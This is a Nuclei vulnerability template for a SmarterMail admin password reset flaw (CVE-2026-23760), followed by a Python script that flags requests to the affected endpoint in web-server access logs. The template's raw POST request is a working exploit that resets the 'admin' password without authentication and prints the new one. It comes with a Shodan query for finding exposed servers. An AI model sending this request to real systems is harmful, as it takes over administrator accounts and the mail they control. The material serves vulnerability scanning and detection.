id: CVE-2026-23760

info:
  name: SmarterTools SmarterMail - Admin Password Reset
  author: watchTowr,DhiyaneshDk
  severity: critical
  description: |
    Detected a SmarterMail admin password reset vulnerability by sending a POST request to the `/api/v1/auth/force-reset-password` endpoint, indicating that administrative password resets could potentially be triggered without proper authorization.
  impact: |
    Unauthenticated attackers can reset administrator passwords, leading to full administrative compromise of the system.
  remediation: |
    Upgrade to build 9511 or later.
  reference:
    - https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"SmarterMail"
  tags: cve,cve2026,intrusive,smartmail,admin,auth-bypass,vkev,kev

variables:
  password: "{{rand_text_alphanumeric(12)}}"

http:
  - raw:
      - |
        POST /api/v1/auth/force-reset-password HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"IsSysAdmin":"true", "OldPassword":"watever", "Username":"admin", "NewPassword":"{{password}}", "ConfirmPassword": "{{password}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - 'debugInfo'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: dsl
        dsl:
          - '"New Password: " + password'
# digest: 4a0a00473045022075bc7a151ad673dcb658ce533235d67c2ed4910dd7c7b346be8535b6003e35f20221008669e4d8d1250dbbe0ffbb7b727bf10329de1163fc4c76ff4546665575bf303c:922c64590222798bb761d5b6d8e72950
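A defender-side companion to the template above, added here and not part of the Nuclei project or of the template itself: it scans web-server access logs for POSTs to the force-reset endpoint the template probes and prioritises accepted (HTTP 200) requests from outside the organisation's own address space. The log lines and the internal address ranges are constructed assumptions.

```python
import re
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Endpoint abused by CVE-2026-23760 (the path the template above probes).
RESET_PATH = "/api/v1/auth/force-reset-password"
# Assumption: these are the organisation's own address ranges; anything else is external.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed combined-log-format sample, not real traffic.
SAMPLE_LOG = """\
203.0.113.45 - - [12/Jan/2026:10:14:03 +0000] "POST /api/v1/auth/force-reset-password HTTP/1.1" 200 187 "-" "python-requests/2.31"
10.0.0.8 - - [12/Jan/2026:10:15:10 +0000] "GET /interface/root HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Jan/2026:10:16:22 +0000] "POST /api/v1/auth/force-reset-password HTTP/1.1" 401 52 "-" "curl/8.4.0"
10.0.0.8 - - [12/Jan/2026:10:17:00 +0000] "POST /api/v1/auth/force-reset-password HTTP/1.1" 200 187 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

@dataclass
class Finding:
    ip: str
    timestamp: str
    status: int
    user_agent: str
    external: bool  # True when the source is outside INTERNAL_NETS

def scan_reset_attempts(log_text: str) -> list[Finding]:
    """Every POST to the force-reset endpoint; the status separates accepted from rejected."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        # Ignore non-POSTs and other paths; drop any query string before comparing.
        if not m or m["method"] != "POST" or m["path"].split("?", 1)[0] != RESET_PATH:
            continue
        src = ip_address(m["ip"])
        findings.append(Finding(m["ip"], m["ts"], int(m["status"]), m["ua"],
                                not any(src in net for net in INTERNAL_NETS)))
    return findings

def successful_external_resets(log_text: str) -> list[Finding]:
    """High-priority subset: HTTP 200 (reset accepted) from an external source."""
    return [f for f in scan_reset_attempts(log_text) if f.status == 200 and f.external]

if __name__ == "__main__":
    for f in successful_external_resets(SAMPLE_LOG):
        print(f"ALERT {f.timestamp} {f.ip} {f.user_agent}: admin password reset accepted")
```

Access logs do not carry the response body, so a 200 here is a strong signal rather than the template's `"success":true` confirmation; corroborate hits against the server's own audit logs and, on any match on a build earlier than 9511, treat the admin credential as compromised.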